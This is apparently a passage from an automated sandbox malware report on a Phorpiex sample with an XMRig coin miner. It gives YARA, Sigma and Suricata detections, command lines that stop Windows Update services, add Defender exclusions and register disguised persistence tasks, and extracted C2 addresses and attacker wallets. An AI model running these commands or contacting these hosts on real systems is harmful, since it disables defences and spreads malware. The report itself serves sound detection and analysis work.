51.2.winupsecvmgr.exe.7ff75d000320.1.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4cb268:$a1: mining.set_target 0x4c6a48:$a2: XMRIG_HOSTNAME 0x4c8540:$a3: Usage: xmrig [OPTIONS] 0x4c6a20:$a4: XMRIG_VERSION
51.2.winupsecvmgr.exe.7ff75d000320.1.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4d1241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
51.2.winupsecvmgr.exe.7ff75d000320.1.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4d17a0:$s1: %s/%s (Windows NT %lu.%lu 0x4d1fc8:$s3: \\.\WinRing0_ 0x4ca4c8:$s4: pool_wallet 0x4c62d0:$s5: cryptonight 0x4c62e0:$s5: cryptonight 0x4c62f0:$s5: cryptonight 0x4c6300:$s5: cryptonight 0x4c6318:$s5: cryptonight 0x4c6328:$s5: cryptonight 0x4c6338:$s5: cryptonight 0x4c6350:$s5: cryptonight 0x4c6360:$s5: cryptonight 0x4c6378:$s5: cryptonight 0x4c6390:$s5: cryptonight 0x4c63a0:$s5: cryptonight 0x4c63b0:$s5: cryptonight 0x4c63c0:$s5: cryptonight 0x4c63d8:$s5: cryptonight 0x4c63f0:$s5: cryptonight 0x4c6400:$s5: cryptonight 0x4c6410:$s5: cryptonight
51.2.winupsecvmgr.exe.7ff75d000320.1.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
51.2.winupsecvmgr.exe.7ff75d000320.1.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4ca268:$a1: mining.set_target 0x4c5a48:$a2: XMRIG_HOSTNAME 0x4c7540:$a3: Usage: xmrig [OPTIONS] 0x4c5a20:$a4: XMRIG_VERSION
51.2.winupsecvmgr.exe.7ff75d000320.1.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4d0241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
51.2.winupsecvmgr.exe.7ff75d000320.1.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4d07a0:$s1: %s/%s (Windows NT %lu.%lu 0x4d0fc8:$s3: \\.\WinRing0_ 0x4c94c8:$s4: pool_wallet 0x4c52d0:$s5: cryptonight 0x4c52e0:$s5: cryptonight 0x4c52f0:$s5: cryptonight 0x4c5300:$s5: cryptonight 0x4c5318:$s5: cryptonight 0x4c5328:$s5: cryptonight 0x4c5338:$s5: cryptonight 0x4c5350:$s5: cryptonight 0x4c5360:$s5: cryptonight 0x4c5378:$s5: cryptonight 0x4c5390:$s5: cryptonight 0x4c53a0:$s5: cryptonight 0x4c53b0:$s5: cryptonight 0x4c53c0:$s5: cryptonight 0x4c53d8:$s5: cryptonight 0x4c53f0:$s5: cryptonight 0x4c5400:$s5: cryptonight 0x4c5410:$s5: cryptonight
51.2.winupsecvmgr.exe.7ff75cffca40.2.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
51.2.winupsecvmgr.exe.7ff75cffca40.2.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4ceb48:$a1: mining.set_target 0x4ca328:$a2: XMRIG_HOSTNAME 0x4cbe20:$a3: Usage: xmrig [OPTIONS] 0x4ca300:$a4: XMRIG_VERSION
51.2.winupsecvmgr.exe.7ff75cffca40.2.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4d4b21:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
51.2.winupsecvmgr.exe.7ff75cffca40.2.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4d5080:$s1: %s/%s (Windows NT %lu.%lu 0x4d58a8:$s3: \\.\WinRing0_ 0x4cdda8:$s4: pool_wallet 0x4c9bb0:$s5: cryptonight 0x4c9bc0:$s5: cryptonight 0x4c9bd0:$s5: cryptonight 0x4c9be0:$s5: cryptonight 0x4c9bf8:$s5: cryptonight 0x4c9c08:$s5: cryptonight 0x4c9c18:$s5: cryptonight 0x4c9c30:$s5: cryptonight 0x4c9c40:$s5: cryptonight 0x4c9c58:$s5: cryptonight 0x4c9c70:$s5: cryptonight 0x4c9c80:$s5: cryptonight 0x4c9c90:$s5: cryptonight 0x4c9ca0:$s5: cryptonight 0x4c9cb8:$s5: cryptonight 0x4c9cd0:$s5: cryptonight 0x4c9ce0:$s5: cryptonight 0x4c9cf0:$s5: cryptonight
51.2.winupsecvmgr.exe.7ff75cfc0000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
51.2.winupsecvmgr.exe.7ff75cfc0000.0.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x509d88:$a1: mining.set_target 0x505568:$a2: XMRIG_HOSTNAME 0x507060:$a3: Usage: xmrig [OPTIONS] 0x505540:$a4: XMRIG_VERSION
51.2.winupsecvmgr.exe.7ff75cfc0000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x50fd61:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
51.2.winupsecvmgr.exe.7ff75cfc0000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x5102c0:$s1: %s/%s (Windows NT %lu.%lu 0x510ae8:$s3: \\.\WinRing0_ 0x508fe8:$s4: pool_wallet 0x504df0:$s5: cryptonight 0x504e00:$s5: cryptonight 0x504e10:$s5: cryptonight 0x504e20:$s5: cryptonight 0x504e38:$s5: cryptonight 0x504e48:$s5: cryptonight 0x504e58:$s5: cryptonight 0x504e70:$s5: cryptonight 0x504e80:$s5: cryptonight 0x504e98:$s5: cryptonight 0x504eb0:$s5: cryptonight 0x504ec0:$s5: cryptonight 0x504ed0:$s5: cryptonight 0x504ee0:$s5: cryptonight 0x504ef8:$s5: cryptonight 0x504f10:$s5: cryptonight 0x504f20:$s5: cryptonight 0x504f30:$s5: cryptonight
Click to see the 25 entries

Sigma Signatures

Operating System Destruction

Sigma detected: Stop multiple services

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait, CommandLine: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\sysppvrdnvs.exe, ParentImage: C:\Windows\sysppvrdnvs.exe, ParentProcessId: 7612, ParentProcessName: sysppvrdnvs.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait, ProcessId: 7712, ProcessName: cmd.exe

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, ProcessId: 7872, ProcessName: powershell.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\sysppvrdnvs.exe, ParentImage: C:\Windows\sysppvrdnvs.exe, ParentProcessId: 7612, ParentProcessName: sysppvrdnvs.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", ProcessId: 7696, ProcessName: cmd.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\sysppvrdnvs.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\446629599.exe, ProcessId: 4260, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Settings

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\70AF.exe", CommandLine: "C:\Users\user~1\AppData\Local\Temp\70AF.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\70AF.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\70AF.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\70AF.exe, ParentCommandLine: "C:\Users\user\Desktop\T52Z708x2p.exe", ParentImage: C:\Users\user\Desktop\T52Z708x2p.exe, ParentProcessId: 7320, ParentProcessName: T52Z708x2p.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\70AF.exe", ProcessId: 7504, ProcessName: 70AF.exe

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\sysppvrdnvs.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\1706633239.exe, ProcessId: 7568, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7696, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", ProcessId: 7784, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 7312, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-26T07:26:26.938191+0200	2019714	2	Potentially Bad Traffic	192.168.2.7	49714	185.215.113.66	80	TCP

ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-26T07:26:43.729077+0200	2044077	1	A Network Trojan was detected	192.168.2.7	56959	87.237.236.86	40500	UDP
2024-10-26T07:26:48.717330+0200	2044077	1	A Network Trojan was detected	192.168.2.7	56959	185.203.237.213	40500	UDP
2024-10-26T07:26:53.717070+0200	2044077	1	A Network Trojan was detected	192.168.2.7	56959	175.107.23.112	40500	UDP
2024-10-26T07:26:58.943016+0200	2044077	1	A Network Trojan was detected	192.168.2.7	56959	146.70.53.161	40500	UDP
2024-10-26T07:27:03.935506+0200	2044077	1	A Network Trojan was detected	192.168.2.7	56959	5.234.49.217	40500	UDP
2024-10-26T07:27:13.967750+0200	2044077	1	A Network Trojan was detected	192.168.2.7	56959	2.179.178.50	40500	UDP
2024-10-26T07:27:18.967050+0200	2044077	1	A Network Trojan was detected	192.168.2.7	56959	195.158.16.52	40500	UDP
2024-10-26T07:27:34.113951+0200	2044077	1	A Network Trojan was detected	192.168.2.7	65303	217.24.149.46	40500	UDP
2024-10-26T07:27:39.108008+0200	2044077	1	A Network Trojan was detected	192.168.2.7	65303	88.204.217.130	40500	UDP
2024-10-26T07:27:44.123347+0200	2044077	1	A Network Trojan was detected	192.168.2.7	65303	90.156.162.79	40500	UDP
2024-10-26T07:27:49.142537+0200	2044077	1	A Network Trojan was detected	192.168.2.7	65303	175.107.23.112	40500	UDP
2024-10-26T07:27:54.155419+0200	2044077	1	A Network Trojan was detected	192.168.2.7	65303	185.71.152.222	40500	UDP
2024-10-26T07:28:04.201234+0200	2044077	1	A Network Trojan was detected	192.168.2.7	65303	124.109.48.132	40500	UDP
2024-10-26T07:28:09.215117+0200	2044077	1	A Network Trojan was detected	192.168.2.7	65303	213.206.50.15	40500	UDP
2024-10-26T07:28:14.218368+0200	2044077	1	A Network Trojan was detected	192.168.2.7	65303	109.165.55.243	40500	UDP
2024-10-26T07:28:19.256594+0200	2044077	1	A Network Trojan was detected	192.168.2.7	65303	175.106.46.94	40500	UDP
2024-10-26T07:28:24.271475+0200	2044077	1	A Network Trojan was detected	192.168.2.7	65303	195.190.112.66	40500	UDP
2024-10-26T07:28:29.267068+0200	2044077	1	A Network Trojan was detected	192.168.2.7	65303	87.237.236.86	40500	UDP

ETPRO COINMINER XMR CoinMiner Usage

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-26T07:26:19.402093+0200	2826930	2	Crypto Currency Mining Activity Detected	192.168.2.7	49999	185.215.113.66	5152	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-26T07:26:30.080927+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49732	185.215.113.66	80	TCP
2024-10-26T07:26:35.033091+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49732	185.215.113.66	80	TCP
2024-10-26T07:26:41.658980+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49795	185.215.113.66	80	TCP
2024-10-26T07:26:43.624460+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49810	185.215.113.66	80	TCP
2024-10-26T07:26:50.871840+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49810	185.215.113.66	80	TCP
2024-10-26T07:26:52.901261+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49857	185.215.113.66	80	TCP
2024-10-26T07:26:59.325870+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49857	185.215.113.66	80	TCP
2024-10-26T07:27:01.277687+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49906	185.215.113.66	80	TCP
2024-10-26T07:27:07.823960+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49906	185.215.113.66	80	TCP
2024-10-26T07:27:09.900851+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49950	185.215.113.66	80	TCP
2024-10-26T07:27:15.959104+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49982	185.215.113.84	80	TCP
2024-10-26T07:27:16.278325+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49950	185.215.113.66	80	TCP
2024-10-26T07:27:18.192626+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49984	185.215.113.66	80	TCP
2024-10-26T07:27:18.592254+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49985	91.202.233.141	80	TCP
2024-10-26T07:27:24.473008+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49988	91.202.233.141	80	TCP
2024-10-26T07:27:31.363041+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49989	185.215.113.66	80	TCP
2024-10-26T07:27:33.391758+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49991	185.215.113.66	80	TCP
2024-10-26T07:27:39.164988+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49993	185.215.113.66	80	TCP
2024-10-26T07:27:41.095072+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49994	185.215.113.66	80	TCP
2024-10-26T07:27:47.532889+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49994	185.215.113.66	80	TCP
2024-10-26T07:27:50.560256+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49996	185.215.113.66	80	TCP
2024-10-26T07:27:56.986988+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49996	185.215.113.66	80	TCP
2024-10-26T07:27:59.047279+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49998	185.215.113.66	80	TCP
2024-10-26T07:28:05.957338+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49998	185.215.113.66	80	TCP
2024-10-26T07:28:07.933526+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	50000	185.215.113.66	80	TCP
2024-10-26T07:28:16.804925+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	50002	91.202.233.141	80	TCP
2024-10-26T07:28:19.244467+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	50002	91.202.233.141	80	TCP
2024-10-26T07:28:21.708824+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	50002	91.202.233.141	80	TCP
2024-10-26T07:28:24.042373+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	50002	91.202.233.141	80	TCP
2024-10-26T07:28:26.416523+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	50002	91.202.233.141	80	TCP
2024-10-26T07:28:30.988248+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	50005	185.215.113.66	80	TCP

ETPRO MALWARE Phorpiex Domain in DNS Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-26T07:26:29.149666+0200	2856563	1	A Network Trojan was detected	192.168.2.7	49258	1.1.1.1	53	UDP

ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-26T07:26:19.402093+0200	2837677	1	A Network Trojan was detected	185.215.113.66	80	192.168.2.7	49989	TCP
2024-10-26T07:26:19.402093+0200	2837677	1	A Network Trojan was detected	185.215.113.66	80	192.168.2.7	49795	TCP
2024-10-26T07:26:19.402093+0200	2837677	1	A Network Trojan was detected	185.215.113.66	80	192.168.2.7	50005	TCP
2024-10-26T07:26:44.169957+0200	2837677	1	A Network Trojan was detected	185.215.113.66	80	192.168.2.7	49810	TCP
2024-10-26T07:27:33.706544+0200	2837677	1	A Network Trojan was detected	185.215.113.66	80	192.168.2.7	49991	TCP

ETPRO MALWARE Win32/Phorpiex Bot Executable Payload Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-26T07:26:19.402093+0200	2853272	1	A Network Trojan was detected	185.215.113.66	80	192.168.2.7	49714	TCP

ETPRO MALWARE Win32/Phorpiex Twizt Variant CnC Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-26T07:26:35.033091+0200	2853292	1	Malware Command and Control Activity Detected	192.168.2.7	49732	185.215.113.66	80	TCP

ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-26T07:26:41.658980+0200	2848295	1	A Network Trojan was detected	192.168.2.7	49795	185.215.113.66	80	TCP
2024-10-26T07:26:43.624460+0200	2848295	1	A Network Trojan was detected	192.168.2.7	49810	185.215.113.66	80	TCP
2024-10-26T07:26:50.871840+0200	2848295	1	A Network Trojan was detected	192.168.2.7	49810	185.215.113.66	80	TCP
2024-10-26T07:26:52.901261+0200	2848295	1	A Network Trojan was detected	192.168.2.7	49857	185.215.113.66	80	TCP
2024-10-26T07:26:59.325870+0200	2848295	1	A Network Trojan was detected	192.168.2.7	49857	185.215.113.66	80	TCP
2024-10-26T07:27:01.277687+0200	2848295	1	A Network Trojan was detected	192.168.2.7	49906	185.215.113.66	80	TCP
2024-10-26T07:27:07.823960+0200	2848295	1	A Network Trojan was detected	192.168.2.7	49906	185.215.113.66	80	TCP
2024-10-26T07:27:09.900851+0200	2848295	1	A Network Trojan was detected	192.168.2.7	49950	185.215.113.66	80	TCP
2024-10-26T07:27:16.278325+0200	2848295	1	A Network Trojan was detected	192.168.2.7	49950	185.215.113.66	80	TCP
2024-10-26T07:27:18.192626+0200	2848295	1	A Network Trojan was detected	192.168.2.7	49984	185.215.113.66	80	TCP
2024-10-26T07:27:31.363041+0200	2848295	1	A Network Trojan was detected	192.168.2.7	49989	185.215.113.66	80	TCP
2024-10-26T07:27:33.391758+0200	2848295	1	A Network Trojan was detected	192.168.2.7	49991	185.215.113.66	80	TCP
2024-10-26T07:27:39.164988+0200	2848295	1	A Network Trojan was detected	192.168.2.7	49993	185.215.113.66	80	TCP
2024-10-26T07:27:41.095072+0200	2848295	1	A Network Trojan was detected	192.168.2.7	49994	185.215.113.66	80	TCP
2024-10-26T07:27:47.532889+0200	2848295	1	A Network Trojan was detected	192.168.2.7	49994	185.215.113.66	80	TCP
2024-10-26T07:27:50.560256+0200	2848295	1	A Network Trojan was detected	192.168.2.7	49996	185.215.113.66	80	TCP
2024-10-26T07:27:56.986988+0200	2848295	1	A Network Trojan was detected	192.168.2.7	49996	185.215.113.66	80	TCP
2024-10-26T07:27:59.047279+0200	2848295	1	A Network Trojan was detected	192.168.2.7	49998	185.215.113.66	80	TCP
2024-10-26T07:28:05.957338+0200	2848295	1	A Network Trojan was detected	192.168.2.7	49998	185.215.113.66	80	TCP
2024-10-26T07:28:07.933526+0200	2848295	1	A Network Trojan was detected	192.168.2.7	50000	185.215.113.66	80	TCP
2024-10-26T07:28:16.804925+0200	2848295	1	A Network Trojan was detected	192.168.2.7	50002	91.202.233.141	80	TCP
2024-10-26T07:28:19.244467+0200	2848295	1	A Network Trojan was detected	192.168.2.7	50002	91.202.233.141	80	TCP
2024-10-26T07:28:21.708824+0200	2848295	1	A Network Trojan was detected	192.168.2.7	50002	91.202.233.141	80	TCP
2024-10-26T07:28:24.042373+0200	2848295	1	A Network Trojan was detected	192.168.2.7	50002	91.202.233.141	80	TCP
2024-10-26T07:28:26.416523+0200	2848295	1	A Network Trojan was detected	192.168.2.7	50002	91.202.233.141	80	TCP
2024-10-26T07:28:30.988248+0200	2848295	1	A Network Trojan was detected	192.168.2.7	50005	185.215.113.66	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: T52Z708x2p.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\nxmr[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1329646
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Avira: detection malicious, Label: HEUR/AGEN.1315882
Source: C:\Users\user\AppData\Local\Temp\65841553.exe	Avira: detection malicious, Label: WORM/Phorpiex.olrti
Source: C:\Users\user\AppData\Local\Temp\236013504.exe	Avira: detection malicious, Label: TR/Dldr.Agent.daypt
Source: C:\Users\user\AppData\Local\Temp\1332331323.exe	Avira: detection malicious, Label: WORM/Phorpiex.olrti
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\newtpp[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1315882
Source: C:\Users\user\AppData\Local\Temp\446629599.exe	Avira: detection malicious, Label: HEUR/AGEN.1315882
Source: C:\Users\user\AppData\Local\Temp\2448028260.exe	Avira: detection malicious, Label: HEUR/AGEN.1329646
Source: C:\Users\user\AppData\Local\Temp\281653412.exe	Avira: detection malicious, Label: TR/Dldr.Agent.daypt

Found malware configuration

Source: 48.2.sysppvrdnvs.exe.400000.0.unpack

Malware Configuration Extractor: Phorpiex {"C2 url": ["http://185.215.113.66/", "http://91.202.233.141/"], "Wallet": ["15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC", "1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK", "lskaj7asu8rwp4p9kpdqebnqh6kzyuefzqjszyd5w", "ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp", "zil19delrukejtr306u0s7ludxrwk434jcl6ghpng3", "zncBgwqwqquPLHrM4ozrtr3LPyFuNVemy4v", "cro1xq0gkfldclds7y7fa2x6x25zu7ttnxxkjs66gf", "erd1hwcnscv0tldljl68upajgfqrcrmtznth4n6ee46le43cqpe5tatqw96dnx", "kava1r9xek0h0vkfra44lg3rp07teh9elxg2n6vsdzn", "inj1e2g9nyfjcnvgjpaa3czx2spgf2jx3gp4gk0nl9", "osmo125f3mw4xd9htpsq4zj5w5ezm5gags37y6pnhx3", "one1mnk7lk2506r0ewvr7zgwfuyt7ahvngwqedka3x", "3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc", "3ESHude8zUHksQg1h6hHmzY79BS36L91Yn", "DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA", "DsWwjQcpgo8AoFYvFnLrwFpcx8wgjSYLexe", "t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh", "terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5", "thor1tdexg3v738xg9n289d6586frflkkcxxdgtauur", "tz1ZUNuZkWjdTt597axUcyZ5kFRtUZmUKuG2", 